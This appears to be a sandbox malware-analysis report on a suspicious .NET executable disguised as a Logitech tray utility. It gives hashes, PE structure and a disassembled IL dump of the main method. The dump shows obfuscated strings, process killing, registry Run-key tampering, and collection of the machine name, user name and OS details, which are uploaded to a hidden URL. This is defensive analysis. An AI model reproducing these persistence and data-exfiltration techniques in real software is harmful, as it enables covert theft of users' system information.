Suspicious
Suspect

b0864972b55d854ae2d3e46214bb534e

PE Executable
|
MD5: b0864972b55d854ae2d3e46214bb534e
|
Size: 879.1 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

High

Hash
 Hash Value
MD5
b0864972b55d854ae2d3e46214bb534e
Sha1
3796e0fbd93177a56f18827b686ac74ccc819beb
Sha256
e70663f255cdcd944674e30d9145eb09065f55a0507e5da93268f21efe4987f1
Sha384
f9f079e8484045fb4a5ef80b1bda2eecfb4a6af81d17d4363049a21116ae4576accdf3ab18a9820cdd309b60b168b5a9
Sha512
f09867977702c0176cbe676a70fbbb70beae6d9a2b4735379c0aca6c4a087974dc605870b0951eb025a051253bdd9cc84507f231db2c1b0b6ba321c5ea12d7cd
SSDeep
12288:9LZdfrXg+JwuKt/S/605t3bc0zLHRMoAz5UL5vT03jkNryTlZ5TzBZjiRLnBg8Gw:9Lfw+Jwz/S/6GzTK4QHv2zWW
TLSH
1915042839EB9019F173EFB95BD4759ADA6FB3733703A45E109103864B23A81DED143A

PeID

Microsoft Visual C++ DLL
Microsoft Visual C++ v6.0
File Structure
b0864972b55d854ae2d3e46214bb534e
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rsrc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
LogiOverTray.Properties.Resources.resources
certificate
costura.costura.dll.compressed
costura.costura.dll
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.costura.pdb.compressed
costura.costura.pdb
costura.newtonsoft.json.dll.compressed
costura.newtonsoft.json.dll
[Authenticode]_5366eba8.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.system.diagnostics.diagnosticsource.dll.compressed
costura.system.diagnostics.diagnosticsource.dll
[Authenticode]_50c89911.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.watsontcp.dll.compressed
costura.watsontcp.dll
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.metadata
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Info

PDB Path: D:\_Projects\C#\2022\LogitechV2\LogiOverTray\obj\x64\Release\b6f8b66b13df4d858a54724afbb7f791.pdb
Module Name

b6f8b66b13df4d858a54724afbb7f791.exe
Full Name

b6f8b66b13df4d858a54724afbb7f791.exe
EntryPoint

System.Void LogiOverTray.Program::Main(System.String[])
Scope Name

b6f8b66b13df4d858a54724afbb7f791.exe
Scope Type

ModuleDef
Kind

Console
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

b6f8b66b13df4d858a54724afbb7f791
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.7.2
Total Strings

334
Main Method

System.Void LogiOverTray.Program::Main(System.String[])
Main IL Instruction Count

463
Main IL

newobj System.Void System.Collections.Generic.List`1<System.Diagnostics.Process>::.ctor() stloc.0 <null> ldc.i4.0 <null> call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) stloc.1 <null> ldc.i4.0 <null> stloc.2 <null> br.s IL_0080: ldloc.2 ldloc.1 <null> ldloc.2 <null> ldelem.ref <null> stloc.3 <null> ldloc.3 <null> callvirt System.Diagnostics.ProcessModuleCollection System.Diagnostics.Process::get_Modules() callvirt System.Collections.IEnumerator System.Collections.ReadOnlyCollectionBase::GetEnumerator() stloc.s V_4 br.s IL_0057: ldloc.s V_4 ldloc.s V_4 callvirt System.Object System.Collections.IEnumerator::get_Current() castclass System.Diagnostics.ProcessModule stloc.s V_5 ldloc.s V_5 callvirt System.String System.Diagnostics.ProcessModule::get_ModuleName() ldc.i4.1 <null> call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) callvirt System.Boolean System.String::Contains(System.String) brfalse.s IL_0052: leave.s IL_0057 ldloc.0 <null> ldloc.3 <null> callvirt System.Void System.Collections.Generic.List`1<System.Diagnostics.Process>::Add(System.Diagnostics.Process) leave.s IL_0057: ldloc.s V_4 pop <null> leave.s IL_0057: ldloc.s V_4 ldloc.s V_4 callvirt System.Boolean System.Collections.IEnumerator::MoveNext() brtrue.s IL_0029: ldloc.s V_4 leave.s IL_0077: leave.s IL_007C ldloc.s V_4 isinst System.IDisposable stloc.s V_6 ldloc.s V_6 brfalse.s IL_0076: endfinally ldloc.s V_6 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_007C: ldloc.2 pop <null> leave.s IL_007C: ldloc.2 ldloc.2 <null> ldc.i4.1 <null> add <null> stloc.2 <null> ldloc.2 <null> ldloc.1 <null> ldlen <null> conv.i4 <null> blt.s IL_0016: ldloc.1 ldloc.0 <null> callvirt System.Void System.Collections.Generic.List`1<System.Diagnostics.Process>::Reverse() ldc.i4.0 <null> stloc.s V_7 br.s IL_00B1: ldloc.s V_7 nop <null> ldloc.0 <null> ldloc.s V_7 callvirt System.Diagnostics.Process System.Collections.Generic.List`1<System.Diagnostics.Process>::get_Item(System.Int32) callvirt System.Void System.Diagnostics.Process::Kill() ldc.i4.s 100 call System.Void System.Threading.Thread::Sleep(System.Int32) leave.s IL_00AB: ldloc.s V_7 pop <null> leave.s IL_00AB: ldloc.s V_7 ldloc.s V_7 ldc.i4.1 <null> add <null> stloc.s V_7 ldloc.s V_7 ldloc.0 <null> callvirt System.Int32 System.Collections.Generic.List`1<System.Diagnostics.Process>::get_Count() ldc.i4.1 <null> sub <null> blt.s IL_0091: nop ldc.i4 2500 call System.Void System.Threading.Thread::Sleep(System.Int32) ldc.i4.2 <null> call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) stsfld System.String LogiOverTray.Program::pqdoscsjqguyhw ldc.i4.3 <null> call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) stsfld System.String LogiOverTray.Program::uqqyawavhoxaqjwj newobj System.Void System.Security.Cryptography.X509Certificates.X509Certificate2::.ctor() stsfld System.Security.Cryptography.X509Certificates.X509Certificate2 LogiOverTray.Program::lxlouwvviqdnq ldsfld System.Security.Cryptography.X509Certificates.X509Certificate2 LogiOverTray.Program::lxlouwvviqdnq call System.Byte[] LogiOverTray.Properties.Resources::get_certificate() ldsfld System.String LogiOverTray.Program::uqqyawavhoxaqjwj ldc.i4.0 <null> callvirt System.Void System.Security.Cryptography.X509Certificates.X509Certificate::Import(System.Byte[],System.String,System.Security.Cryptography.X509Certificates.X509KeyStorageFlags) ldc.i4.0 <null> stloc.s V_8 ldstr stloc.s V_9 ldstr stloc.s V_10 ldstr stloc.s V_11 ldstr stloc.s V_12 ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldc.i4.4 <null> call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_13 ldloc.s V_13 callvirt System.String[] Microsoft.Win32.RegistryKey::GetValueNames() stloc.s V_14 ldc.i4.0 <null> stloc.2 <null> br IL_027A: ldloc.2 ldloc.s V_14 ldloc.2 <null> ldelem.ref <null> stloc.s V_15 ldloc.s V_15 call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue IL_0276: ldloc.2 ldloc.s V_13 ldloc.s V_15 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) stloc.s V_16 ldloc.s V_16 callvirt System.String System.Object::ToString() call System.String System.IO.Path::GetDirectoryName(System.String) call System.String[] System.IO.Directory::GetFiles(System.String) stloc.s V_17 ldc.i4.0 <null> stloc.s V_18 br.s IL_01B2: ldloc.s V_18 ldloc.s V_17 ldloc.s V_18 ldelem.ref <null> stloc.s V_19 ldloc.s V_19 call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_01A7: leave.s IL_01AC ldloc.s V_19 callvirt System.String System.Object::ToString() callvirt System.String System.String::ToLower() ldc.i4.5 <null> call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) callvirt System.Boolean System.String::Contains(System.String) brfalse.s IL_01A7: leave.s IL_01AC ldloc.s V_19 call System.String System.IO.Path::GetDirectoryName(System.String) stloc.s V_12 leave.s IL_01BA: leave.s IL_01BF leave.s IL_01AC: ldloc.s V_18 pop <null> leave.s IL_01AC: ldloc.s V_18 ldloc.s V_18 ldc.i4.1 <null> add <null> stloc.s V_18 ldloc.s V_18 ldloc.s V_17 ldlen <null> conv.i4 <null> blt.s IL_0173: ldloc.s V_17 leave.s IL_01BF: ldloc.s V_12 pop <null> leave.s IL_01BF: ldloc.s V_12 ldloc.s V_12 call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue IL_0276: ldloc.2 newobj System.Void System.Random::.ctor() ldc.i4.3 <null> ldc.i4.5 <null> callvirt System.Int32 System.Random::Next(System.Int32,System.Int32) call System.String LogiOverTray.Program::lrkqjntplujnw(System.Int32) callvirt System.String System.String::ToLower() ldc.i4.s 20 call System.Void System.Threading.Thread::Sleep(System.Int32) newobj System.Void System.Random::.ctor() ldc.i4.3 <null> ldc.i4.5 <null> callvirt System.Int32 System.Random::Next(System.Int32,System.Int32) call System.String LogiOverTray.Program::lrkqjntplujnw(System.Int32) callvirt System.String System.String::ToLower() stloc.s V_20 ldc.i4.6 <null> call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) ldloc.s V_20 call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_21 ldloc.s V_12 ldc.i4.7 <null> call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) call System.String[] System.IO.Directory::GetFiles(System.String,System.String) ldc.i4.0 <null> ldelem.ref <null> stloc.s V_9 ldloc.s V_12 ldloc.s V_9 ldc.i4.8 <null> call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) newobj System.Void System.Random::.ctor() ldc.i4 1000 ldc.i4 9999 callvirt System.Int32 System.Random::Next(System.Int32,System.Int32) stloc.s V_18 ldloca.s V_18 call System.String System.Int32::ToString() call System.String System.Text.RegularExpressions.Regex::Replace(System.String,System.String,System.String) call System.String System.IO.Path::Combine(System.String,System.String) stloc.s V_10 ldloc.s V_9 ldloc.s V_10 call System.Void System.IO.File::Move(System.String,System.String) ldloc.s V_13 ldloc.s V_21 ldloc.s V_10 callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) ldloc.s V_13 ldloc.s V_15 ldc.i4.0 <null> callvirt System.Void Microsoft.Win32.RegistryKey::DeleteValue(System.String,System.Boolean) leave.s IL_0276: ldloc.2 pop <null> leave.s IL_0276: ldloc.2 ldloc.2 <null> ldc.i4.1 <null> add <null> stloc.2 <null> ldloc.2 <null> ldloc.s V_14 ldlen <null> conv.i4 <null> blt IL_013E: ldloc.s V_14 leave.s IL_0292: ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldloc.s V_13 brfalse.s IL_0291: endfinally ldloc.s V_13 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldc.i4.4 <null> call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_22 call System.String System.IO.Directory::GetCurrentDirectory() call System.String[] System.IO.Directory::GetFiles(System.String) stloc.s V_14 ldc.i4.0 <null> stloc.2 <null> br IL_050B: ldloc.2 ldloc.s V_14 ldloc.2 <null> ldelem.ref <null> stloc.s V_23 ldloc.s V_23 callvirt System.String System.String::ToLower() ldc.i4.5 <null> call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) callvirt System.Boolean System.String::Contains(System.String) brfalse IL_0507: ldloc.2 ldloc.s V_23 call System.IO.DirectoryInfo System.IO.Directory::GetParent(System.String) callvirt System.String System.IO.FileSystemInfo::get_FullName() ldc.i4.7 <null> call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) call System.String[] System.IO.Directory::GetFiles(System.String,System.String) ldc.i4.0 <null> ldelem.ref <null> stloc.s V_9 ldloc.s V_22 callvirt System.String[] Microsoft.Win32.RegistryKey::GetValueNames() stloc.s V_17 ldc.i4.0 <null> stloc.s V_18 br.s IL_0345: ldloc.s V_18 ldloc.s V_17 ldloc.s V_18 ldelem.ref <null> stloc.s V_24 ldloc.s V_24 call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_033F: ldloc.s V_18 ldloc.s V_22 ldloc.s V_24 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) stloc.s V_25 ldloc.s V_9 callvirt System.Int32 System.String::get_Length() ldc.i4.0 <null> ble.s IL_033F: ldloc.s V_18 ldloc.s V_25 callvirt System.String System.Object::ToString() ldloc.s V_9 call System.String System.IO.Path::GetFileName(System.String) callvirt System.Boolean System.String::Contains(System.String) brfalse.s IL_033F: ldloc.s V_18 ldloc.s V_24 stloc.s V_11 ldc.i4.1 <null> stloc.s V_8 ldloc.s V_18 ldc.i4.1 <null> add <null> stloc.s V_18 ldloc.s V_18 ldloc.s V_17 ldlen <null> conv.i4 <null> blt.s IL_02FE: ldloc.s V_17 ldloc.s V_8 brtrue IL_0507: ldloc.2 newobj System.Void System.Random::.ctor() ldc.i4.3 <null> ldc.i4.5 <null> callvirt System.Int32 System.Random::Next(System.Int32,System.Int32) call System.String LogiOverTray.Program::lrkqjntplujnw(System.Int32) callvirt System.String System.String::ToLower() ldc.i4.s 20 call System.Void System.Threading.Thread::Sleep(System.Int32) newobj System.Void System.Random::.ctor() ldc.i4.3 <null> ldc.i4.5 <null> callvirt System.Int32 System.Random::Next(System.Int32,System.Int32) call System.String LogiOverTray.Program::lrkqjntplujnw(System.Int32) callvirt System.String System.String::ToLower() stloc.s V_26 ldc.i4.6 <null> call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) ldloc.s V_26 call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_11 ldloc.s V_9 callvirt System.String System.Object::ToString() call System.IO.DirectoryInfo System.IO.Directory::GetParent(System.String) callvirt System.String System.IO.FileSystemInfo::get_FullName() ldloc.s V_9 ldc.i4.8 <null> call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) newobj System.Void System.Random::.ctor() ldc.i4.s 10 ldc.i4 9999 callvirt System.Int32 System.Random::Next(System.Int32,System.Int32) stloc.s V_18 ldloca.s V_18 call System.String System.Int32::ToString() call System.String System.Text.RegularExpressions.Regex::Replace(System.String,System.String,System.String) call System.String System.IO.Path::Combine(System.String,System.String) stloc.s V_10 ldloc.s V_9 ldloc.s V_10 call System.Void System.IO.File::Move(System.String,System.String) ldloc.s V_22 ldloc.s V_11 ldloc.s V_10 callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) newobj System.Void System.Net.WebClient::.ctor() stloc.s V_27 ldloc.s V_27 callvirt System.Net.WebHeaderCollection System.Net.WebClient::get_Headers() ldc.i4.s 12 ldc.i4.s 9 call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) callvirt System.Void System.Net.WebHeaderCollection::Add(System.Net.HttpRequestHeader,System.String) call System.String System.Environment::get_MachineName() ldc.i4.s 10 call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) call System.String System.Environment::get_UserName() call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_28 newobj System.Void LogiOverTray.vdjcvkuheocfiixp::.ctor() dup <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldloc.s V_28 call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0437: call System.Guid System.Guid::NewGuid() ldloc.s V_28 br.s IL_044B: callvirt System.Byte[] System.Text.Encoding::GetBytes(System.String) call System.Guid System.Guid::NewGuid() stloc.s V_31 ldloca.s V_31 constrained. System.Guid callvirt System.String System.Object::ToString() callvirt System.Byte[] System.Text.Encoding::GetBytes(System.String) call System.String System.Convert::ToBase64String(System.Byte[]) stfld System.String LogiOverTray.vdjcvkuheocfiixp::nomepc dup <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() newobj System.Void Microsoft.VisualBasic.Devices.ComputerInfo::.ctor() call System.String Microsoft.VisualBasic.Devices.ComputerInfo::get_OSFullName() ldc.i4.s 11 call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) call System.String System.String::Concat(System.String,System.String) callvirt System.Byte[] System.Text.Encoding::GetBytes(System.String) call System.String System.Convert::ToBase64String(System.Byte[]) stfld System.String LogiOverTray.vdjcvkuheocfiixp::operationalsystem dup <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldsfld System.String LogiOverTray.Program::pqdoscsjqguyhw callvirt System.Byte[] System.Text.Encoding::GetBytes(System.String) call System.String System.Convert::ToBase64String(System.Byte[]) stfld System.String LogiOverTray.vdjcvkuheocfiixp::versionapp newobj System.Void System.Collections.Generic.List`1<System.String>::.ctor() stloc.s V_29 call System.Collections.Generic.List`1<System.String> LogiOverTray.Program::chtfsrbpk() stloc.s V_29 dup <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldc.i4.s 12 call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) ldloc.s V_29 callvirt System.String[] System.Collections.Generic.List`1<System.String>::ToArray() call System.String System.String::Join(System.String,System.String[]) callvirt System.Byte[] System.Text.Encoding::GetBytes(System.String) call System.String System.Convert::ToBase64String(System.Byte[]) stfld System.String LogiOverTray.vdjcvkuheocfiixp::plugins ldloc.s V_29 callvirt System.Void System.Collections.Generic.List`1<System.String>::Clear() call System.String Newtonsoft.Json.JsonConvert::SerializeObject(System.Object) stloc.s V_30 ldloc.s V_27 ldc.i4.s 13 call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) ldloc.s V_30 callvirt System.String System.Net.WebClient::UploadString(System.String,System.String) pop <null> leave.s IL_0502: leave.s IL_0507 ldloc.s V_27 brfalse.s IL_0501: endfinally ldloc.s V_27 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0507: ldloc.2 pop <null> leave.s IL_0507: ldloc.2 ldloc.2 <null> ldc.i4.1 <null> add <null> stloc.2 <null> ldloc.2 <null> ldloc.s V_14 ldlen <null> conv.i4 <null> blt IL_02B8: ldloc.s V_14 leave.s IL_0523: leave.s IL_0528 ldloc.s V_22 brfalse.s IL_0522: endfinally ldloc.s V_22 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0528: call System.Void LogiOverTray.Program::xtaxjadxrhihuqxli() pop <null> leave.s IL_0528: call System.Void LogiOverTray.Program::xtaxjadxrhihuqxli() call System.Void LogiOverTray.Program::xtaxjadxrhihuqxli() ldc.i4 200 call System.Void System.Threading.Thread::Sleep(System.Int32) br.s IL_052D: ldc.i4 200
b0864972b55d854ae2d3e46214bb534e (879.1 KB)
File Structure
b0864972b55d854ae2d3e46214bb534e
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rsrc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
LogiOverTray.Properties.Resources.resources
certificate
costura.costura.dll.compressed
costura.costura.dll
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.costura.pdb.compressed
costura.costura.pdb
costura.newtonsoft.json.dll.compressed
costura.newtonsoft.json.dll
[Authenticode]_5366eba8.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.system.diagnostics.diagnosticsource.dll.compressed
costura.system.diagnostics.diagnosticsource.dll
[Authenticode]_50c89911.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.watsontcp.dll.compressed
costura.watsontcp.dll
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.metadata
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙